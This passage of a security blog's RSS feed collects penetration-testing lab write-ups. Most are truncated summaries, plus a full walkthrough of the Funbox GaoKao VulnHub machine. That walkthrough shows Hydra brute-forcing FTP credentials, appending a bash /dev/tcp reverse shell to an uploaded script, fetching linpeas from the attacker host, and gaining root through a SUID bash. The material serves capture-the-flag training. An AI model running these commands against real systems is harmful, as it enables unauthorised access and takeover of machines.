*   **Goal:** Obtain the flags in user.txt and root.txt.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Byxs20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-Up%29.html</guid><pubDate>Mon, 21 Apr 2025 11:10:48 +0000</pubDate></item><item><title>7r1umph Target Penetration Test Report (Write-up)</title><link>https://7r1UMPH.github.io/post/7r1umph%20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-up%29.html</link><description>## 1. Target Information

*   **Target name:** 7r1umph (unreleased internal test machine; may be published on HackMyVm later)
*   **Difficulty**: easy
*   **Target IP:** 192.168.205.187 (discovered via `arp-scan`)
*   **Attacker IP:** 192.168.205.128 (Kali Linux)

## 2. Information Gathering

### 2.1 Host Discovery

Use `arp-scan` to discover live hosts on the local network.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/7r1umph%20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-up%29.html</guid><pubDate>Sun, 13 Apr 2025 07:35:48 +0000</pubDate></item><item><title>Penetration Test Report - AkaRed (Test Machine)</title><link>https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20AkaRed%20%28-ce-shi-ba-ji-%29.html</link><description>## 1. Introduction

**Target name**: AkaRed (unreleased internal test machine; may be published on HackMyVm later)
**Difficulty**: Super easy
**Attacker IP:** `192.168.205.128` (Kali Linux)
**Target IP:** `192.168.205.185` (AkaRed)

## 1. Information Gathering (Enumeration)

This phase aims to discover the target and learn which services it exposes.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20AkaRed%20%28-ce-shi-ba-ji-%29.html</guid><pubDate>Fri, 11 Apr 2025 12:55:07 +0000</pubDate></item><item><title>Penetration Test Report - JuMo (Test Machine)</title><link>https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20JuMo%20%28-ce-shi-ba-ji-%29.html</link><description># 1. Introduction

- Target name: JuMo (unreleased internal test machine; may be published on HackMyVm later)
- Difficulty: Low
- Target IP: 192.168.205.182 (discovered via arp-scan)
- Attacker IP: 192.168.205.128
- Goal: obtain root on the target system and find the flag.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20JuMo%20%28-ce-shi-ba-ji-%29.html</guid><pubDate>Fri, 11 Apr 2025 01:07:08 +0000</pubDate></item><item><title>Group Topic Follow-up: `-ne` Bypass - Variable Parsing and Lessons from Python 2 `input()`</title><link>https://7r1UMPH.github.io/post/qun-zhu-ti-hou-xu-%20%60-ne%60%20-rao-guo-%20-%20-bian-liang-jie-xi-yu-%20Python%202%20%60input%28%29%60%20-de-qi-shi.html</link><description>## Preface

In the previous [WP](https://7r1umph.github.io/post/qun-zhu-ti.html), we discussed how entering a non-integer string (such as `aaa`) bypasses the random-number check `[[ '$INPUTS' -ne '$a' ]]` in a Bash script.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/qun-zhu-ti-hou-xu-%20%60-ne%60%20-rao-guo-%20-%20-bian-liang-jie-xi-yu-%20Python%202%20%60input%28%29%60%20-de-qi-shi.html</guid><pubDate>Wed, 09 Apr 2025 01:16:01 +0000</pubDate></item><item><title>eNSP Compatibility Issue on Windows 11 24H2 Resolved by Update KB5053656</title><link>https://7r1UMPH.github.io/post/eNSP%20-zai-%20Windows%2011%2024H2%20-shang-de-jian-rong-xing-wen-ti-yi-tong-guo-%20KB5053656%20-geng-xin-jie-jue.html</link><description>## Background

Many users found that Huawei's network simulation platform eNSP no longer worked after upgrading Windows 11 to **Version 24H2**.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/eNSP%20-zai-%20Windows%2011%2024H2%20-shang-de-jian-rong-xing-wen-ti-yi-tong-guo-%20KB5053656%20-geng-xin-jie-jue.html</guid><pubDate>Wed, 09 Apr 2025 00:30:27 +0000</pubDate></item><item><title>hackmyvm Lab - Bruteforcelab</title><link>https://7r1UMPH.github.io/post/hackmyvm-ba-chang--Bruteforcelab.html</link><description># Introduction

![image-20250322203846278](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250322203846321.png)

Target: [Bruteforcelab](https://hackmyvm.eu/machines/machine.php?vm=Bruteforcelab)  
Difficulty: Green  
Target IP: 192.168.205.164  
Local IP: 192.168.205.128  
Key points: intended for practising brute forcing and SMB service exploitation.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hackmyvm-ba-chang--Bruteforcelab.html</guid><pubDate>Sat, 22 Mar 2025 13:13:19 +0000</pubDate></item><item><title>🌟 Site Beautification Upgrade Completed</title><link>https://7r1UMPH.github.io/post/%F0%9F%8C%9F%20-zhan-dian-mei-hua-sheng-ji-wan-cheng-tong-gao.html</link><description>![](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250321105722076.png)</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/%F0%9F%8C%9F%20-zhan-dian-mei-hua-sheng-ji-wan-cheng-tong-gao.html</guid><pubDate>Fri, 21 Mar 2025 02:58:57 +0000</pubDate></item><item><title>vulnhub_Funbox_ GaoKao</title><link>https://7r1UMPH.github.io/post/vulnhub_Funbox_%20GaoKao.html</link><description># vulnhub_Funbox: GaoKao

# 0. Introduction

**Target**: https://vulnhub.com/entry/funbox-gaokao,707/  
**Difficulty**: Green  
**Target IP**: 192.168.205.152  
**Local IP**: 192.168.205.128

# 1. Scanning

Start with `nmap`

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.152
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-09 17:56 CST
Nmap scan report for 192.168.205.152
Host is up (0.00025s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
|   256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_  256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after:  2031-06-03T15:15:30
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.34-0ubuntu0.18.04.1
|   Thread ID: 3
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, Speaks41ProtocolNew, ConnectWithDatabase, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake, IgnoreSigpipes, SupportsLoadDataLocal, SupportsCompression, ODBCClient, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: w5w-\x05[lh(@\x08Zp*'=C:\x01\x10
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:84:89:FF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.205.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.41 seconds
                                      
```

Gaokao may be a username

# 2. Reconnaissance

```
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.152
Connected to 192.168.205.152.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.205.152]
Name (192.168.205.152:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.205.128 !
230-
230-The local time is: Sun Feb 09 09:57:05 2025
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to &lt;sky@funbox9&gt;.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls -la
229 Entering Extended Passive Mode (|||13045|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Jun  5  2021 .
drwxr-xr-x   2 ftp      ftp          4096 Jun  5  2021 ..
-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
226 Transfer complete
ftp&gt; mget welcome.msg
mget welcome.msg [anpqy?]? y                                                                                                         
229 Entering Extended Passive Mode (|||48839|)
150 Opening BINARY mode data connection for welcome.msg (169 bytes)
100% |******************************************************************************************|   169        5.55 MiB/s    00:00 ETA
226 Transfer complete
169 bytes received in 00:00 (150.30 KiB/s)
ftp&gt; exit
221 Goodbye.
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ cat welcome.msg 
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server.  If you have any unusual problems,
please report them via e-mail to &lt;sky@%L&gt;.

                
```

sky may be a username; continue

```
┌──(kali㉿kali)-[~/test]
└─$ gobuster dir -u http://192.168.205.152 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,md | grep -v '403'
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.205.152
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,md,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10310]
/.                    (Status: 200) [Size: 10310]

```

Just a default page with nothing hidden, so brute-force SSH and FTP (MySQL too, if those really turn up nothing)

```
┌──(kali㉿kali)-[~/test]
└─$ hydra -L user -P /usr/share/wordlists/q5000.txt ssh://192.168.205.152 -V -I -u -f -e nsr -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-09 18:01:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10006 login tries (l:2/p:5003), ~157 tries per task
[DATA] attacking ssh://192.168.205.152:22/

```

```
┌──(kali㉿kali)-[~/test]
└─$ hydra -L user -P /usr/share/wordlists/q5000.txt ftp://192.168.205.152 -V -I -u -f -e nsr -t 64

Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-09 18:01:04
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10006 login tries (l:2/p:5003), ~157 tries per task
[DATA] attacking ftp://192.168.205.152:21/

[21][ftp] host: 192.168.205.152   login: sky   password: thebest
[STATUS] attack finished for 192.168.205.152 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-09 18:02:53

```

FTP gave a hit; log in and take a look

```
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.152
Connected to 192.168.205.152.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.205.152]
Name (192.168.205.152:kali): sky
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls -la
229 Entering Extended Passive Mode (|||39399|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
226 Transfer complete
ftp&gt; mget *
mget user.flag [anpqy?]? y
229 Entering Extended Passive Mode (|||51733|)
150 Opening BINARY mode data connection for user.flag (66 bytes)
100% |******************************************************************************************|    66        1.65 MiB/s    00:00 ETA
226 Transfer complete
66 bytes received in 00:00 (41.31 KiB/s)
ftp&gt; exit
221 Goodbye.
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ cat user.flag 
#!/bin/sh
echo 'Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd'
              
```

There is a script that looks like a background script; let's append a shell to it and see

```
┌──(kali㉿kali)-[~/test]
└─$ echo 'bash -i &gt;&amp;/dev/tcp/192.168.205.128/8888 0&gt;&amp;1' &gt;&gt; user.flag
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.152
Connected to 192.168.205.152.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.205.152]
Name (192.168.205.152:kali): sky
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls -la
229 Entering Extended Passive Mode (|||24304|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
226 Transfer complete
ftp&gt; put user.flag 
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||53542|)
150 Opening BINARY mode data connection for user.flag
100% |******************************************************************************************|   111        2.35 MiB/s    00:00 ETA
226 Transfer complete
111 bytes sent in 00:00 (117.56 KiB/s)

```

Listen in another window

```
┌──(kali㉿kali)-[~/test]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.205.128] from (UNKNOWN) [192.168.205.152] 52670
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)

```

# 3. Getting a Stable Shell

After obtaining the **reverse shell**, use the following commands to get a stable **interactive** **TTY shell**:

```bash
script /dev/null -c bash  
ctrl+z  
stty raw -echo; fg  
reset xterm  
export TERM=xterm  
echo $SHELL  
export SHELL=/bin/bash  
stty rows 59 cols 236
```

# 4. Privilege Escalation

```
bash-4.4$ sudo -l
[sudo] password for sarah: 
bash-4.4$ ls -al
total 36
dr-xr-xr-x 4 sarah sarah 4096 Jun  6  2021 .
drwxr-xr-x 5 root  root  4096 Jun  5  2021 ..
-r--r--r-- 1 sarah sarah  220 Jun  5  2021 .bash_logout
-r--r--r-- 1 sarah sarah 3771 Jun  5  2021 .bashrc
dr-x------ 2 sarah sarah 4096 Jun  5  2021 .cache
dr-x------ 3 sarah sarah 4096 Jun  5  2021 .gnupg
-r--r--r-- 1 sarah sarah  807 Jun  5  2021 .profile
-r--rw-r-- 1 sarah sarah   74 Jun  5  2021 .selected_editor
-r-------- 1 sarah sarah 3214 Jun  6  2021 .viminfo
bash-4.4$ cd ..
bash-4.4$ ls -la
total 20
drwxr-xr-x  5 root  root  4096 Jun  5  2021 .
drwxr-xr-x 24 root  root  4096 Jun  5  2021 ..
drwxr-xr-x  4 lucy  lucy  4096 Jun  6  2021 lucy
dr-xr-xr-x  4 sarah sarah 4096 Jun  6  2021 sarah
drwxr-xr-x  3 sky   sky   4096 Jun  6  2021 sky
bash-4.4$ cd lucy/
bash-4.4$ ls -al
total 36
drwxr-xr-x 4 lucy lucy 4096 Jun  6  2021 .
drwxr-xr-x 5 root root 4096 Jun  5  2021 ..
-rw------- 1 lucy lucy  192 Jun  6  2021 .bash_history                                                                               
-rw-r--r-- 1 lucy lucy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 lucy lucy 3771 Apr  4  2018 .bashrc
drwx------ 2 lucy lucy 4096 Jun  5  2021 .cache
drwx------ 3 lucy lucy 4096 Jun  5  2021 .gnupg
-rw-r--r-- 1 lucy lucy  807 Apr  4  2018 .profile
-rw-r--r-- 1 lucy lucy    0 Jun  5  2021 .sudo_as_admin_successful
-rw------- 1 lucy lucy  702 Jun  6  2021 .viminfo
bash-4.4$ cd ..
bash-4.4$ ls -al
total 20
drwxr-xr-x  5 root  root  4096 Jun  5  2021 .
drwxr-xr-x 24 root  root  4096 Jun  5  2021 ..
drwxr-xr-x  4 lucy  lucy  4096 Jun  6  2021 lucy
dr-xr-xr-x  4 sarah sarah 4096 Jun  6  2021 sarah
drwxr-xr-x  3 sky   sky   4096 Jun  6  2021 sky
bash-4.4$ cd sky/
bash-4.4$ ls -al
total 36
drwxr-xr-x 3 sky  sky   4096 Jun  6  2021 .
drwxr-xr-x 5 root root  4096 Jun  5  2021 ..
-rw------- 1 sky  sky     56 Jun  5  2021 .bash_history
-r--r--r-- 1 sky  sky    220 Jun  5  2021 .bash_logout
-r--r--r-- 1 sky  sky   3771 Jun  5  2021 .bashrc
-r--r--r-- 1 sky  sky    807 Jun  5  2021 .profile
drwxr----- 2 root root  4096 Jun  5  2021 .ssh
-rwxr-x--- 1 sky  sarah  111 Feb  9 10:04 user.flag
-rw------- 1 sky  sky   1489 Jun  5  2021 .viminfo
bash-4.4$ find / -perm -4000 -type f 2&gt;/dev/null
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

```

Upload a script (actually my target VM was acting up and bash was missing from the list)

```
bash-4.4$ wget 192.168.205.128/linpeas.sh
--2025-02-09 10:08:54--  http://192.168.205.128/linpeas.sh
Connecting to 192.168.205.128:80... failed: Connection refused.
bash-4.4$ wget 192.168.205.128/linpeas.sh
--2025-02-09 10:08:59--  http://192.168.205.128/linpeas.sh
Connecting to 192.168.205.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 839766 (820K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                                   0%[                                                                       linpeas.sh                                                 100%[========================================================================================================================================&gt;] 820.08K  --.-KB/s    in 0.003s  

2025-02-09 10:08:59 (269 MB/s) - ‘linpeas.sh’ saved [839766/839766]

bash-4.4$ chmod +x linpeas.sh 
bash-4.4$ bash linpeas.sh 
```

Still nothing, so reinstall the VM

```
┌──(kali㉿kali)-[~/test]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
id
connect to [192.168.205.128] from (UNKNOWN) [192.168.205.152] 48504
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ find / -perm -4000 -type f 2&gt;/dev/null
find / -perm -4000 -type f 2&gt;/dev/null
/bin/bash
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

```

bash -p

```
bash-4.4$ bash -p
bash -p
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)

```</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/vulnhub_Funbox_%20GaoKao.html</guid><pubDate>Thu, 20 Mar 2025 08:35:32 +0000</pubDate></item><item><title>thl_THLCPPT_V16 Notes</title><link>https://7r1UMPH.github.io/post/thl_THLCPPT_V16-bi-ji.html</link><description># thl_THLCPPT_V16 Notes

**Target**: https://thehackerslabs.com/thlcpptv16/

**Difficulty**: Expert (EXPERTO)

**Target IP**: 192.168.205.152
**Local IP**: 192.168.205.141

# 1. Port Enumeration and Service Detection

Use `nmap` to scan the target IP for open ports:

```
nmap 192.168.205.152
```

![image](https://github.com/user-attachments/assets/c9e617e5-96af-47a7-832e-7ea63715d9d6)

Visit port 80

![image](https://github.com/user-attachments/assets/b8625cb6-3e5c-483b-aa82-6ccbfc550f2a)

Clicking Ir al Examen reveals two subdomains:

1. examen.thlcpptv16.thl
2. thlcpptv16.thl

Add both domain names to `/etc/hosts` and investigate further.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/thl_THLCPPT_V16-bi-ji.html</guid><pubDate>Thu, 20 Mar 2025 08:34:31 +0000</pubDate></item><item><title>thl_sinplomo98 Notes</title><link>https://7r1UMPH.github.io/post/thl_sinplomo98-bi-ji.html</link><description># thl_sinplomo98 Notes

**Target**: https://thehackerslabs.com/sinplomo98/  
**Difficulty**: Advanced (AVANZADO)  
**Attacker IP**: 192.168.205.141  
**Target IP**: 192.168.205.157

# 1. Port Scanning

First, use `nmap` to scan the target machine for open ports:

```
nmap 192.168.205.157
```

![image](https://github.com/user-attachments/assets/35d20d5f-2eb5-461b-a2aa-e2ff6bcdff3f)

The scan shows that several ports are open on the target; port 21 (FTP) and port 5000 (web service) are the ones I find interesting.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/thl_sinplomo98-bi-ji.html</guid><pubDate>Thu, 20 Mar 2025 08:33:29 +0000</pubDate></item><item><title>thl_Offensive</title><link>https://7r1UMPH.github.io/post/thl_Offensive.html</link><description># thl_Offensive

**Target**: [thehackerslabs - offensive](https://thehackerslabs.com/offensive/)  
**Difficulty**: Professional (PROFESIONAL)  
**Target IP**: 192.168.205.220  
**Local IP**: 192.168.205.141

---

## 1. Port Enumeration and Service Detection

First, use `nmap` to scan the target IP for open ports:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 11:32 CST
Nmap scan report for 192.168.205.220
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
8080/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:B1:A8:86 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
```

From the `nmap` results, the target has ports **22** (SSH), **80** (HTTP) and **8080** (HTTP) open.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/thl_Offensive.html</guid><pubDate>Thu, 20 Mar 2025 08:32:27 +0000</pubDate></item><item><title>thl_ensala-papas</title><link>https://7r1UMPH.github.io/post/thl_ensala-papas.html</link><description># thl_ensala-papas

# 0. Introduction

**Target**: [thehackerslabs - ensala-papas](https://thehackerslabs.com/ensala-papas/)  
**Difficulty**: Beginner  
**Target IP**: 192.168.205.221  
**Local IP**: 192.168.205.141

---

# 1. Scanning

Start with `nmap` to probe the ports first

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:17 CST
Nmap scan report for 192.168.205.221
Host is up (0.00068s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE    SERVICE
80/tcp    open     http
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
3167/tcp  filtered nowcontact
47001/tcp open     winrm
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49156/tcp open     unknown
49157/tcp open     unknown
MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds
                                                                   
```

Then probe the services in detail

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p80,135,139,445,47001,49152,49153,49154,49155,49156,49157 192.168.205.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:19 CST
Nmap scan report for 192.168.205.221
Host is up (0.00046s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.00 seconds
                                                                
```

Probe UDP services

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sU -n -T4 --top-ports 100 192.168.205.221 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:27 CST
Nmap scan report for 192.168.205.221
Host is up (0.00048s latency).
Not shown: 62 closed udp ports (port-unreach), 37 open|filtered udp ports (no-response)
PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 69.21 seconds
```

Scan for vulnerabilities with `nmap`

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap --script=vuln -p80,135,139,445,47001,49152,49153,49154,49155,49156,49157 192.168.205.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:24 CST
Nmap scan report for 192.168.205.221
Host is up (0.00056s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

